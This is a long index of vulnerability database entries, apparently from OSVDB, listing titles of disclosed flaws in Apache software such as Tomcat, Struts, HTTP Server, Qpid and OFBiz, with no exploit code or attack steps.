| [91235] Apache Rave /app/api/rpc/users/get User Object Hashed Password Remote Disclosure
| [91185] Munin Default Apache Configuration Permission Weakness Remote Information Disclosure
| [91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access
| [91172] Apache Wicket PackageResourceGuard File Extension Filter Bypass
| [91025] Apache Qpid qpid::framing::Buffer Class Multiple Method Out-of-bounds Access Remote DoS
| [91024] Apache Qpid federation_tag Attribute Handling Federated Interbroker Link Access Restriction Bypass
| [91023] Apache Qpid AMQP Type Decoder Exposure Array Size Value Handling Memory Consumption Remote DoS
9108| [91023] Apache Qpid AMQP Type Decoder Exposure Array Size Value Handling Memory Consumption Remote DoS
9109| [91022] Apache Qpid qpid/cpp/include/qpid/framing/Buffer.h qpid::framing::Buffer::checkAvailable() Function Integer Overflow
9110| [90986] Apache Jena ARQ INSERT DATA Request Handling Overflow
9111| [90907] Apache Subversion mod_dav_svn / libsvn_fs svn_fs_file_length() Function MKACTIVITY / PROPFIND Option Request Handling Remote DoS
9112| [90906] Apache Commons FileUpload /tmp Storage Symlink Arbitrary File Overwrite
9113| [90864] Apache Batik 1xx Redirect Script Origin Restriction Bypass
9114| [90858] Apache Ant Malformed TAR File Handling Infinite Loop DoS
9115| [90852] Apache HTTP Server for Debian apachectl /var/lock Permission Weakness Symlink Directory Permission Manipulation
9116| [90804] Apache Commons CLI Path Subversion Local Privilege Escalation
9117| [90802] Apache Avro Recursive Schema Handling Infinite Recursion DoS
9118| [90592] Apache Batik ApplicationSecurityEnforcer.java Multiple Method Security Restriction Bypass
9119| [90591] Apache Batik XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
9120| [90565] Apache Tomcat Log Directory Permission Weakness Local Information Disclosure
9121| [90564] Apache Maven / Maven Wagon SSL Certificate Validation MitM Spoofing Weakness
9122| [90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS
9123| [90556] Apache HTTP Server Multiple Module Multiple Parameter XSS
9124| [90276] Apache Axis2 axis2.xml Plaintext Password Local Disclosure
9125| [90249] Apache Axiom ClassLoader XMLInputFactory / XMLOutputFactory Construction Unspecified Issue
9126| [90235] Apache Commons HttpClient Certificate Wildcard Matching Weakness
9127| [90079] Apache CXF WSS4JInInterceptor URIMappingInterceptor WS-Security SOAP Service Access Restriction Bypass
9128| [90078] Apache CXF WS-SecurityPolicy Enabled Plaintext UsernameTokens Handling Authentication Bypass
9129| [89453] Apache Open For Business Project (OFBiz) Screenlet.title Widget Attribute XSS
9130| [89452] Apache Open For Business Project (OFBiz) Image.alt Widget Attribute XSS
9131| [89294] Apache CouchDB Futon UI Browser-based Test Suite Query Parameter XSS
9132| [89293] Apache CouchDB Unspecified Traversal Arbitrary File Access
9133| [89275] Apache HTTP Server mod_proxy_ajp Module Expensive Request Parsing Remote DoS
9134| [89267] Apache CouchDB JSONP Callback Handling Unspecified XSS
9135| [89146] Apache CloudStack Master Server log4j.conf SSH Private Key / Plaintext Password Disclosure
9136| [88603] Apache OpenOffice.org (OOo) Unspecified Information Disclosure
9137| [88602] Apache OpenOffice.org (OOo) Unspecified Manifest-processing Issue
9138| [88601] Apache OpenOffice.org (OOo) Unspecified PowerPoint File Handling Issue
9139| [88285] Apache Tomcat Partial HTTP Request Saturation Remote DoS
9140| [88095] Apache Tomcat NIO Connector Terminated Connection Infinte Loop DoS
9141| [88094] Apache Tomcat FORM Authentication Crafted j_security_check Request Security Constraint Bypass
9142| [88093] Apache Tomcat Null Session Requst CSRF Prevention Filter Bypass
9143| [88043] IBM Tivoli Netcool/Reporter Apache CGI Unspecified Remote Command Execution
9144| [87580] Apache Tomcat DIGEST Authentication Session State Caching Authentication Bypass Weakness
9145| [87579] Apache Tomcat DIGEST Authentication Stale Nonce Verification Authentication Bypass Weakness
9146| [87477] Apache Tomcat Project Woodstock Service Error Page UTF-7 XSS Weakness
9147| [87227] Apache Tomcat InternalNioInputBuffer.java parseHeaders() Function Request Header Size Parsing Remote DoS
9148| [87223] Apache Tomcat DIGEST Authentication replay-countermeasure Functionality cnonce / cn Verification Authentication Bypass Weakness
9149| [87160] Apache Commons HttpClient X.509 Certificate Domain Name Matching MiTM Weakness
9150| [87159] Apache CXF X.509 Certificate Domain Name Matching MiTM Weakness
9151| [87150] Apache Axis / Axis2 X.509 Certificate Domain Name Matching MiTM Weakness
9152| [86902] Apache HTTP Server 3xx Redirect Internal IP Address Remote Disclosure
9153| [86901] Apache Tomcat Error Message Path Disclosure
9154| [86684] Apache CloudStack Unauthorized Arbitrary API Call Invocation
9155| [86556] Apache Open For Business Project (OFBiz) Unspecified Issue
9156| [86503] Visual Tools VS home/apache/DiskManager/cron/init_diskmgr Local Command Execution
9157| [86401] Apache ActiveMQ ResourceHandler Traversal Arbitrary File Access
9158| [86225] Apache Axis2 XML Signature Wrapping (XSW) Authentication Bypass
9159| [86206] Apache Axis2 Crafted SAML Assertion Signature Exclusion Attack Authentication Bypass
9160| [85722] Apache CXF SOAP Request Parsing Access Restriction Bypass
9161| [85704] Apache Qpid Incoming Client Connection Saturation Remote DoS
9162| [85474] Eucalyptus Apache Santuario (XML Security for Java) Library XML Signature Transform Handling DoS
9163| [85430] Apache mod_pagespeed Module Unspecified XSS
9164| [85429] Apache mod_pagespeed Module Hostname Verification Cross-host Resource Disclosure
9165| [85249] Apache Wicket Unspecified XSS
9166| [85236] Apache Hadoop conf/hadoop-env.sh Temporary File Symlink Arbitrary File Manipulation
9167| [85090] Apache HTTP Server mod_proxy_ajp.c mod_proxy_ajp Module Proxy Functionality Cross-client Information Disclosure
9168| [85089] Apache HTTP Server mod_proxy_http.c mod_proxy_http Module Cross-client Information Disclosure
9169| [85062] Apache Solr Autocomplete Module for Drupal Autocomplete Results XSS
9170| [85010] Apache Struts Token Handling Mechanism Token Name Configuration Parameter CSRF Weakness
9171| [85009] Apache Struts Request Parameter OGNL Expression Parsing Remote DoS
9172| [84911] libapache2-mod-rpaf X-Forward-For HTTP Header Parsing Remote DoS
9173| [84823] Apache HTTP Server Multiple Module Back End Server Error Handling HTTP Request Parsing Remote Information Disclosure
9174| [84818] Apache HTTP Server mod_negotiation Module mod_negotiation.c make_variant_list Function XSS
9175| [84562] Apache Qpid Broker Authentication Mechanism AMQP Client Shadow Connection NullAuthenticator Request Parsing Authentication Bypass
9176| [84458] Apache Libcloud SSL Certificate Validation MitM Spoofing Weakness
9177| [84279] PHP on Apache php_default_post_reader POST Request Handling Overflow DoS
9178| [84278] PHP w/ Apache PDO::ATTR_DEFAULT_FETCH_MODE / PDO::FETCH_CLASS DoS
9179| [84231] Apache Hadoop DataNodes Client BlockTokens Arbitrary Block Access
9180| [83943] Oracle Solaris Cluster Apache Tomcat Agent Subcomponent Unspecified Local Privilege Escalation
9181| [83939] Oracle Solaris Apache HTTP Server Subcomponent Unspecified Remote Information Disclosure
9182| [83685] svnauthcheck Apache HTTP Configuration File Permission Revocation Weakness
9183| [83682] Apache Sling POST Servlet @CopyFrom Operation HTTP Request Parsing Infinite Loop Remote DoS
9184| [83339] Apache Roller Blogger Roll Unspecified XSS
9185| [83270] Apache Roller Unspecified Admin Action CSRF
9186| [82782] Apache CXF WS-SecurityPolicy 1.1 SupportingToken Policy Bypass
9187| [82781] Apache CXF WS-SecurityPolicy Supporting Token Children Specification Token Signing Verification Weakness
9188| [82611] cPanel Apache Piped Log Configuration Log Message Formatting Traversal Arbitrary File Creation
9189| [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion
9190| [82215] PHP sapi/cgi/cgi_main.c apache_request_headers Function HTTP Header Handling Remote Overflow
9191| [82161] Apache Commons Compress bzip2 File Compression BZip2CompressorOutputStream Class File Handling Remote DoS
9192| [81965] Apache Batik Squiggle SVG Browser JAR File Arbitrary Code Execution
9193| [81790] Apache POI src/org/apache/poi/hwpf/model/UnhandledDataStructure.java UnhandledDataStructure() constructor Length Attribute CDF / CFBF File Handling Remote DoS
9194| [81660] Apache Qpid Credential Checking Cluster Authentication Bypass
9195| [81511] Apache for Debian /usr/share/doc HTTP Request Parsing Local Script Execution
9196| [81359] Apache HTTP Server LD_LIBRARY_PATH Variable Local Privilege Escalation
9197| [81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS
9198| [81348] Apache Open For Business Project (OFBiz) Content IDs / Map-Keys Unspecified XSS
9199| [81347] Apache Open For Business Project (OFBiz) Parameter Arrays Unspecified XSS
9200| [81346] Apache Open For Business Project (OFBiz) checkoutProcess.js getServerError() Function Unspecified XSS
9201| [81196] Apache Open For Business Project (OFBiz) FlexibleStringExpander Nested Script String Parsing Remote Code Execution
9202| [80981] Apache Hadoop Kerberos/MapReduce Security Feature User Impersonation Weakness
9203| [80571] Apache Traffic Server Host HTTP Header Parsing Remote Overflow
9204| [80547] Apache Struts XSLTResult.java File Upload Arbitrary Command Execution
9205| [80360] AskApache Password Protector Plugin for WordPress Error Page $_SERVER Superglobal XSS
9206| [80349] Apache HTTP Server mod_fcgid Module fcgid_spawn_ctl.c FcgidMaxProcessesPerClass Virtual Host Directive HTTP Request Parsing Remote DoS
9207| [80301] Apache Wicket /resources/ Absolute Path Arbitrary File Access
9208| [80300] Apache Wicket wicket:pageMapName Parameter XSS
9209| [79478] Apache Solr Extension for TYPO3 Unspecified XSS
9210| [79002] Apache MyFaces javax.faces.resource In Parameter Traversal Arbitrary File Access
9211| [78994] Apache Struts struts-examples/upload/upload-submit.do name Parameter XSS
9212| [78993] Apache Struts struts-cookbook/processDyna.do message Parameter XSS
9213| [78992] Apache Struts struts-cookbook/processSimple.do message Parameter XSS
9214| [78991] Apache Struts struts2-rest-showcase/orders clientName Parameter XSS
9215| [78990] Apache Struts struts2-showcase/person/editPerson.action Multiple Parameter XSS
9216| [78932] Apache APR Hash Collision Form Parameter Parsing Remote DoS
9217| [78903] Apache CXF SOAP Request Parsing WS-Security UsernameToken Policy Bypass
9218| [78600] Apache Tomcat HTTP DIGEST Authentication DigestAuthenticator.java Catalina Weakness Security Bypass
9219| [78599] Apache Tomcat HTTP DIGEST Authentication Realm Value Parsing Security Bypass
9220| [78598] Apache Tomcat HTTP DIGEST Authentication qop Value Parsing Security Bypass
9221| [78573] Apache Tomcat Parameter Saturation CPU Consumption Remote DoS
9222| [78556] Apache HTTP Server Status Code 400 Default Error Response httpOnly Cookie Disclosure
9223| [78555] Apache HTTP Server Threaded MPM %{cookiename}C Log Format String Cookie Handling Remote DoS
9224| [78501] Apache Struts ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
9225| [78331] Apache Tomcat Request Object Recycling Information Disclosure
9226| [78293] Apache HTTP Server Scoreboard Invalid Free Operation Local Security Bypass
9227| [78277] Apache Struts ExceptionDelegator Component Parameter Parsing Remote Code Execution
9228| [78276] Apache Struts DebuggingInterceptor Component Developer Mode Unspecified Remote Command Execution
9229| [78113] Apache Tomcat Hash Collision Form Parameter Parsing Remote DoS
9230| [78112] Apache Geronimo Hash Collision Form Parameter Parsing Remote DoS
9231| [78109] Apache Struts ParameterInterceptor Traversal Arbitrary File Overwrite
9232| [78108] Apache Struts CookieInterceptor Cookie Name Handling Remote Command Execution
9233| [77593] Apache Struts Conversion Error OGNL Expression Injection
9234| [77496] Apache ActiveMQ Failover Mechanism Openwire Request Parsing Remote DoS
9235| [77444] Apache HTTP Server mod_proxy Mdule Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass
9236| [77374] Apache MyFaces Java Bean includeViewParameters Parsing EL Expression Security Weakness
9237| [77310] Apache HTTP Server mod_proxy Reverse Proxy Mode Security Bypass Weakness (2011-4317)
9238| [77234] Apache HTTP Server on cygwin Encoded Traversal Arbitrary File Access
9239| [77012] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Memory Consumption DoS
9240| [76944] Apache Tomcat Manager Application Servlets Access Restriction Bypass
9241| [76744] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Overflow
9242| [76189] Apache Tomcat HTTP DIGEST Authentication Weakness
9243| [76079] Apache HTTP Server mod_proxy Mdule Web Request URL Parsing Proxy Remote Security Bypass (2011-3368)
9244| [76072] Apache JServ jserv.conf jserv-status Handler jserv/ URI Request Parsing Local Information Disclosure
9245| [75807] Apache HTTP Server Incomplete Header Connection Saturation Remote DoS
9246| [75647] Apache HTTP Server mod_proxy_ajp Module mod_proxy_balancer HTTP Request Remote DoS
9247| [75376] Apache Libcloud SSL Certificate Validation MitM Server Spoofing Weakness
9248| [74853] Domain Technologie Control /etc/apache2/apache2.conf File Permissions Weakness dtcdaemons User Password Disclosure
9249| [74818] Apache Tomcat AJP Message Injection Authentication Bypass
9250| [74725] Apache Wicket Multi Window Support Unspecified XSS
9251| [74721] Apache HTTP Server ByteRange Filter Memory Exhaustion Remote DoS
9252| [74541] Apache Commons Daemon Jsvc Permissions Weakness Arbitrary File Access
9253| [74535] Apache Tomcat XML Parser Cross-application Multiple File Manipulation
9254| [74447] Apache Struts XWork Nonexistent Method s:submit Element Internal Java Class Remote Path Disclosure
9255| [74262] Apache HTTP Server Multi-Processing Module itk.c Configuration Merger mpm-itk root UID / GID Remote Privilege Escalation
9256| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
9257| [73920] Oracle Secure Backup /apache/htdocts/php/common.php username Parameter Remote Code Execution
9258| [73798] Apache Tomcat sendfile Request Start / Endpoint Parsing Local DoS
9259| [73797] Apache Tomcat sendfile Request Attribute Validation Weakness Local Access Restriction Bypass
9260| [73776] Apache Tomcat HTTP BIO Connector HTTP Pipelining Cross-user Remote Response Access
9261| [73644] Apache XML Security Signature Key Parsing Overflow DoS
9262| [73600] Apache Struts javatemplates Plugin Component Handlers .action URI Multiple Parameter XSS
9263| [73462] Apache Rampart/C util/rampart_timestamp_token.c rampart_timestamp_token_validate Function Expired Token Remote Access Restriction Bypass
9264| [73429] Apache Tomcat JMX MemoryUserDatabase Local Password Disclosure
9265| [73384] Apache HTTP Server mod_rewrite PCRE Resource Exhaustion DoS
9266| [73383] Apache HTTP Server Portable Runtime (APR) Library apr_fnmatch() Infinite Loop Remote DoS
9267| [73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS
9268| [73247] Apache Subversion mod_dav_svn File Permission Weakness Information Disclosure
9269| [73246] Apache Subversion mod_dav_svn Path-based Access Control Rule Handling Remote DoS
9270| [73245] Apache Subversion mod_dav_svn Baselined Resource Request Handling Remote DoS
9271| [73154] Apache Archiva Multiple Unspecified CSRF
9272| [73153] Apache Archiva /archiva/admin/deleteNetworkProxy!confirm.action proxyid Parameter XSS
9273| [72407] Apache Tomcat @ServletSecurity Initial Load Annotation Security Constraint Bypass Information Disclosure
9274| [72238] Apache Struts Action / Method Names <
9275| [71647] Apache HttpComponents HttpClient Proxy-Authorization Credentials Remote Disclosure
9276| [71558] Apache Tomcat SecurityManager ServletContext Attribute Traversal Arbitrary File Manipulation
9277| [71557] Apache Tomcat HTML Manager Multiple XSS
9278| [71075] Apache Archiva User Management Page XSS
9279| [71027] Apache Tomcat @ServletSecurity Annotation Security Constraint Bypass Information Disclosure
9280| [70925] Apache Continuum Project Pages Unspecified XSS (2011-0533)
9281| [70924] Apache Continuum Multiple Admin Function CSRF
9282| [70809] Apache Tomcat NIO HTTP Connector Request Line Processing DoS
9283| [70734] Apache CouchDB Request / Cookie Handling Unspecified XSS
9284| [70585] Oracle Fusion Middleware Oracle HTTP Server Apache Plugin Unspecified Remote Issue
9285| [70333] Apache Subversion rev_hunt.c blame Command Multiple Memory Leak Remote DoS
9286| [70332] Apache Subversion Apache HTTP Server mod_dav_svn repos.c walk FunctionSVNParentPath Collection Remote DoS
9287| [69659] Apache Archiva Admin Authentication Weakness Privilege Escalation
9288| [69520] Apache Archiva Administrator Credential Manipulation CSRF
9289| [69512] Apache Tomcat Set-Cookie Header HTTPOnly Flag Session Hijacking Weakness
9290| [69456] Apache Tomcat Manager manager/html/sessions Multiple Parameter XSS
9291| [69275] Apache mod_fcgid Module fcgid_bucket.c fcgid_header_bucket_read() Function Remote Overflow
9292| [69067] Apache Shiro URI Path Security Traversal Information Disclosure
9293| [68815] Apache MyFaces shared/util/StateUtils.java View State MAC Weakness Cryptographic Padding Remote View State Modification
9294| [68670] Apache Qpid C++ Broker Component broker/SessionAdapter.cpp SessionAdapter::ExchangeHandlerImpl::checkAlternate Function Exchange Alternate Remote DoS
9295| [68669] Apache Qpid cluster/Cluster.cpp Cluster::deliveredEvent Function Invalid AMQP Data Remote DoS
9296| [68662] Apache Axis2 dswsbobje.war Module Admin Account Default Password
9297| [68531] Apache Qpid qpidd sys/ssl/SslSocket.cpp Incomplete SSL Handshake Remote DoS
9298| [68327] Apache APR-util buckets/apr_brigade.c apr_brigade_split_line() Function Memory Consumption DoS
9299| [68314] Apache XML-RPC SAX Parser External Entity Information Disclosure
9300| [67964] Apache Traffic Server Transaction ID / Source Port Randomization Weakness DNS Cache Poisoning
9301| [67846] SUSE Lifecycle Management Server on SUSE Linux Enterprise apache2-slms Parameter Quoting CSRF
9302| [67294] Apache CXF XML SOAP Message Crafted Document Type Declaration Remote DoS
9303| [67240] Apache CouchDB Installation Page Direct Request Arbitrary JavaScript Code Execution CSRF
9304| [67205] Apache Derby BUILTIN Authentication Password Hash Generation Algorithm SHA-1 Transformation Password Substitution
9305| [66745] Apache HTTP Server Multiple Modules Pathless Request Remote DoS
9306| [66319] Apache Tomcat Crafted Transfer-Encoding Header Handling Buffer Recycling Remote DoS
9307| [66280] Apache Struts XWork ParameterInterceptor Server-Side Object Remote Code Execution
9308| [66226] Apache Axis2 Admin Interface Cookie Session Fixation
9309| [65697] Apache Axis2 / Java SOAP Message DTD Rejection Weakness Arbitrary File Access
9310| [65654] Apache HTTP Server mod_proxy_http mod_proxy_http.c Timeout Detection Weakness HTTP Request Response Disclosure
9311| [65429] Apache MyFaces Unencrypted ViewState Serialized View Object Manipulation Arbitrary Expression Language (EL) Statement Execution
9312| [65054] Apache ActiveMQ Jetty Error Handler XSS
9313| [64844] Apache Axis2/Java axis2/axis2-admin/engagingglobally modules Parameter XSS
9314| [64522] Apache Open For Business Project (OFBiz) ecommerce/control/contactus Multiple Parameter XSS
9315| [64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS
9316| [64520] Apache Open For Business Project (OFBiz) ecommerce/control/ViewBlogArticle contentId Parameter XSS
9317| [64519] Apache Open For Business Project (OFBiz) Control Servlet URI XSS
9318| [64518] Apache Open For Business Project (OFBiz) Show Portal Page Section start Parameter XSS
9319| [64517] Apache Open For Business Project (OFBiz) View Profile Section partyId Parameter XSS
9320| [64516] Apache Open For Business Project (OFBiz) Export Product Listing Section productStoreId Parameter XSS
9321| [64307] Apache Tomcat Web Application Manager/Host Manager CSRF
9322| [64056] mod_auth_shadow for Apache HTTP Server wait() Function Authentication Bypass
9323| [64023] Apache Tomcat WWW-Authenticate Header Local Host Information Disclosure
9324| [64020] Apache ActiveMQ Jetty ResourceHandler Crafted Request JSP File Source Disclosure
9325| [63895] Apache HTTP Server mod_headers Unspecified Issue
9326| [63368] Apache ActiveMQ createDestination.action JMSDestination Parameter CSRF
9327| [63367] Apache ActiveMQ createDestination.action JMSDestination Parameter XSS
9328| [63350] Apache CouchDB Hash Verification Algorithm Predictable Execution Time Weakness
9329| [63140] Apache Thrift Service Malformed Data Remote DoS
9330| [62676] Apache HTTP Server mod_proxy_ajp Module Crafted Request Remote DoS
9331| [62675] Apache HTTP Server Multi-Processing Module (MPM) Subrequest Header Handling Cross-thread Information Disclosure
9332| [62674] Apache HTTP Server mod_isapi Module Unloading Crafted Request Remote DoS
9333| [62231] Apache HTTP Server Logging Format Weakness Crafted DNS Response IP Address Spoofing
9334| [62230] Apache HTTP Server Crafted DNS Response Inverse Lookup Log Corruption XSS
9335| [62054] Apache Tomcat WAR Filename Traversal Work-directory File Deletion
9336| [62053] Apache Tomcat Autodeployment Process appBase File HTTP Request Authentication Bypass
9337| [62052] Apache Tomcat WAR File Traversal Arbitrary File Overwrite
9338| [62009] Apache HTTP Server src/modules/proxy/proxy_util.c mod_proxy ap_proxy_send_fb() Function Overflow
9339| [61379] Apache River Outrigger Entry Storage Saturation Memory Exhaustion DoS
9340| [61378] Apache Hadoop Map/Reduce JobTracker Memory Consumption DoS
9341| [61377] Apache Commons Modeler Multiple Mutable Static Fields Weakness
9342| [61376] Apache Rampart wsse:security Tag Signature Value Checking Weakness
9343| [60687] Apache C++ Standard Library (STDCXX) strxfrm() Function Overflow
9344| [60680] Apache Hadoop JobHistory Job Name Manipulation Weakness
9345| [60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection
9346| [60678] Apache Roller Comment Email Notification Manipulation DoS
9347| [60677] Apache CouchDB Unspecified Document Handling Remote DoS
9348| [60428] Sun Java Plug-in org.apache.crimson.tree.XmlDocument Class reateXmlDocument Method Floppy Drive Access Bypass
9349| [60413] mod_throttle for Apache Shared Memory File Manipulation Local Privilege Escalation
9350| [60412] Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
9351| [60396] Apache HTTP Server on OpenBSD Multipart MIME Boundary Remote Information Disclosure
9352| [60395] Apache HTTP Server on OpenBSD ETag HTTP Header Remote Information Disclosure
9353| [60232] PHP on Apache php.exe Direct Request Remote DoS
9354| [60176] Apache Tomcat Windows Installer Admin Default Password
9355| [60016] Apache HTTP Server on HP Secure OS for Linux HTTP Request Handling Unspecified Issue
9356| [59979] Apache HTTP Server on Apple Mac OS X HTTP TRACE Method Unspecified Client XSS
9357| [59969] Apache HTTP Server mod_ssl SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
9358| [59944] Apache Hadoop jobhistory.jsp XSS
9359| [59374] Apache Solr Search Extension for TYPO3 Unspecified XSS
9360| [59022] Apache Shindig ConcatProxyServlet HTTP Header Response Splitting
9361| [59021] Apache Cocoon X-Cocoon-Version Header Remote Information Disclosure
9362| [59020] Apache Tapestry HTTPS Session Cookie Secure Flag Weakness
9363| [59019] Apache mod_python Cookie Salting Weakness
9364| [59018] Apache Harmony Error Message Handling Overflow
9365| [59013] Apache Derby SYSCS_EXPORT_TABLE Arbitrary File Overwrite
9366| [59012] Apache Derby Driver Auto-loading Non-deterministic Startup Weakness
9367| [59011] Apache JSPWiki Page Attachment Change Note Function XSS
9368| [59010] Apache Solr get-file.jsp XSS
9369| [59009] Apache Solr action.jsp XSS
9370| [59008] Apache Solr analysis.jsp XSS
9371| [59007] Apache Solr schema.jsp Multiple Parameter XSS
9372| [59006] Apache Beehive select / checkbox Tag XSS
9373| [59005] Apache Beehive jpfScopeID Global Parameter XSS
9374| [59004] Apache Beehive Error Message XSS
9375| [59003] Apache HttpClient POST Request Handling Memory Consumption DoS
9376| [59002] Apache Jetspeed default-page.psml URI XSS
9377| [59001] Apache Axis2 xsd Parameter Traversal Arbitrary File Disclosure
9378| [59000] Apache CXF Unsigned Message Policy Bypass
9379| [58999] Apache WSS4J CallbackHandler Plaintext Password Validation Weakness
9380| [58998] Apache OpenJPA persistence.xml Cleartext Password Local Disclosure
9381| [58997] Apache OpenEJB openejb.xml Cleartext Password Local Disclosure
9382| [58996] Apache Hadoop Map/Reduce LinuxTaskController File Group Ownership Weakness
9383| [58995] Apache Hadoop Map/Reduce Task Ownership Weakness
9384| [58994] Apache Hadoop Map/Reduce DistributedCache Localized File Permission Weakness
9385| [58993] Apache Hadoop browseBlock.jsp XSS
9386| [58991] Apache Hadoop browseDirectory.jsp XSS
9387| [58990] Apache Hadoop Map/Reduce HTTP TaskTrackers User Data Remote Disclosure
9388| [58989] Apache Hadoop Sqoop Process Listing Local Cleartext Password Disclosure
9389| [58988] Apache Hadoop Chukwa HICC Portal Unspecified XSS
9390| [58987] Apache Hadoop Map/Reduce TaskTracker User File Permission Weakness
9391| [58986] Apache Qpid Encrypted Message Handling Remote Overflow DoS
9392| [58985] Apache Qpid Process Listing Local Cleartext Password Disclosure
9393| [58984] Apache Jackrabbit Content Repository (JCR) Default Account Privilege Access Weakness
9394| [58983] Apache Jackrabbit Content Repository (JCR) NamespaceRegistry API Registration Method Race Condition
9395| [58982] Apache Synapse Proxy Service Security Policy Mismatch Weakness
9396| [58981] Apache Geronimo TomcatGeronimoRealm Security Context Persistence Weakness
9397| [58980] Apache Geronimo LDAP Realm Configuration Restart Reversion Weakness
9398| [58979] Apache MyFaces Tomahawk ExtensionsPhaseListener HTML Injection Information Disclosure
9399| [58978] Apache MyFaces Trinidad LocaleInfoScriptlet XSS
9400| [58977] Apache Open For Business Project (OFBiz) Multiple Default Accounts
9401| [58976] Apache Open For Business Project (OFBiz) URI passThru Parameter XSS
9402| [58975] Apache Open For Business Project (OFBiz) PARTYMGR_CREATE/UPDATE Permission Arbitrary User Password Modification
9403| [58974] Apache Sling /apps Script User Session Management Access Weakness
9404| [58973] Apache Tuscany Crafted SOAP Request Access Restriction Bypass
9405| [58931] Apache Geronimo Cookie Parameters Validation Weakness
9406| [58930] Apache Xalan-C++ XPath Handling Remote DoS
9407| [58879] Apache Portable Runtime (APR-util) poll/unix/port.c Event Port Backend Pollset Feature Remote DoS
9408| [58837] Apache Commons Net FTPSClient CipherSuites / Protocols Mutable Object Unspecified Data Security Issue
9409| [58813] Apache MyFaces Trinidad tr:table / HTML Comment Handling DoS
9410| [58812] Apache Open For Business Project (OFBiz) JSESSIONID Session Hijacking Weakness
9411| [58811] Apache Open For Business Project (OFBiz) /catalog/control/EditProductConfigItem configItemId Parameter XSS
9412| [58810] Apache Open For Business Project (OFBiz) /catalog/control/EditProdCatalo prodCatalogId Parameter XSS
9413| [58809] Apache Open For Business Project (OFBiz) /partymgr/control/viewprofile partyId Parameter XSS
9414| [58808] Apache Open For Business Project (OFBiz) /catalog/control/createProduct internalName Parameter XSS
9415| [58807] Apache Open For Business Project (OFBiz) Multiple Unspecified CSRF
9416| [58806] Apache FtpServer MINA Logging Filter Cleartext Credential Local Disclosure
9417| [58805] Apache Derby Unauthenticated Database / Admin Access
9418| [58804] Apache Wicket Header Contribution Unspecified Issue
9419| [58803] Apache Wicket Session Fixation
9420| [58802] Apache Directory Server (ApacheDS) userPassword Attribute Search Password Disclosure
9421| [58801] Apache ActiveMQ Stomp Client Credential Validation Bypass
| [58800] Apache Tapestry (context)/servicestatus Internal Service Information Disclosure
| [58799] Apache Tapestry Logging Cleartext Password Disclosure
| [58798] Apache Jetspeed pipeline Parameter pipeline-map Policy Bypass
| [58797] Apache Jetspeed Password Policy Multiple Weaknesses
| [58796] Apache Jetspeed Unsalted Password Storage Weakness
| [58795] Apache Rampart Crafted SOAP Header Authentication Bypass
| [58794] Apache Roller Admin Protocol (RAP) Malformed Header Authentication Bypass
| [58793] Apache Hadoop Map/Reduce mapred.system.dir Permission Weakness Job Manipulation
| [58792] Apache Shindig gadgets.rpc iframe RPC Call Validation Weakness
| [58791] Apache Synapse synapse.properties Cleartext Credential Local Disclosure
| [58790] Apache WSS4J SOAP Message UsernameToken Remote Password Disclosure
| [58789] Apache WSS4J SOAP Header Malformed UsernameToken Authentication Bypass
| [58776] Apache JSPWiki PreviewContent.jsp Edited Text XSS
| [58775] Apache JSPWiki preview.jsp action Parameter XSS
| [58774] Apache JSPWiki Edit.jsp Multiple Parameter XSS
| [58773] Apache JSPWiki Accept-Language Header Multiple Script language Parameter XSS
| [58772] Apache JSPWiki EditorManager.java editor Parameter XSS
| [58771] Apache JSPWiki GroupContent.jsp Multiple Parameter XSS
| [58770] Apache JSPWiki Group.jsp group Parameter XSS
| [58769] Apache JSPWiki Database Connection Termination DoS Weakness
| [58768] Apache JSPWiki Attachment Servlet nextpage Parameter Arbitrary Site Redirect
| [58766] Apache JSPWiki /admin/SecurityConfig.jsp Direct Request Information Disclosure
| [58765] Apache JSPWiki Spam Filter UniqueID RNG Weakness
| [58764] Apache JSPWiki Edit.jsp Multiple Parameter XSS
| [58763] Apache JSPWiki Include Tag Multiple Script XSS
| [58762] Apache JSPWiki Multiple .java Tags pageContext Parameter XSS
| [58761] Apache JSPWiki Wiki.jsp skin Parameter XSS
| [58760] Apache Commons VFS Exception Error Message Cleartext Credential Disclosure
| [58759] Apache Jackrabbit Content Repository (JCR) UUID System.currentTimeMillis() RNG Weakness
| [58758] Apache River GrantPermission Policy Manipulation Privilege Escalation
| [58757] Apache WS-Commons Java2 StaXUtils Multiple Unspecified Minor Issues
| [58756] Apache WSS4J WSHandler Client Certificate Signature Validation Weakness
| [58755] Apache Harmony DRLVM Non-public Class Member Access
| [58754] Apache Harmony File.createTempFile() Temporary File Creation Prediction Weakness
| [58751] Apache Geronimo GeronimoIdentityResolver Subject Handling Multiple Issues
| [58750] Apache MyFaces Trinidad Generated HTML Information Disclosure
| [58749] Apache MyFaces Trinidad Database Access Error Message Information Disclosure
| [58748] Apache MyFaces Trinidad Image Resource Loader Traversal Arbitrary Image Access
| [58747] Apache MyFaces Trinidad Error Message User Entered Data Disclosure Weakness
| [58746] Apache Axis2 JAX-WS Java2 WSDL4J Unspecified Issue
| [58744] Apache Wicket Crafted File Upload Disk Space Exhaustion DoS
| [58743] Apache Wicket wicket.util.crypt.SunJceCrypt Encryption Reversion Weakness
| [58742] Apache Rampart PolicyBasedValiadtor HttpsToken Endpoint Connection Weakness
| [58741] Apache Rampart WSSecSignature / WSSecEncryptedKey KeyIdentifierType Validation Weakness
| [58740] Apache Rampart TransportBinding Message Payload Cleartext Disclosure
| [58739] Apache Open For Business Project (OFBiz) Unsalted Password Storage Weakness
| [58738] Apache Open For Business Project (OFBiz) orderId Parameter Arbitrary Order Access
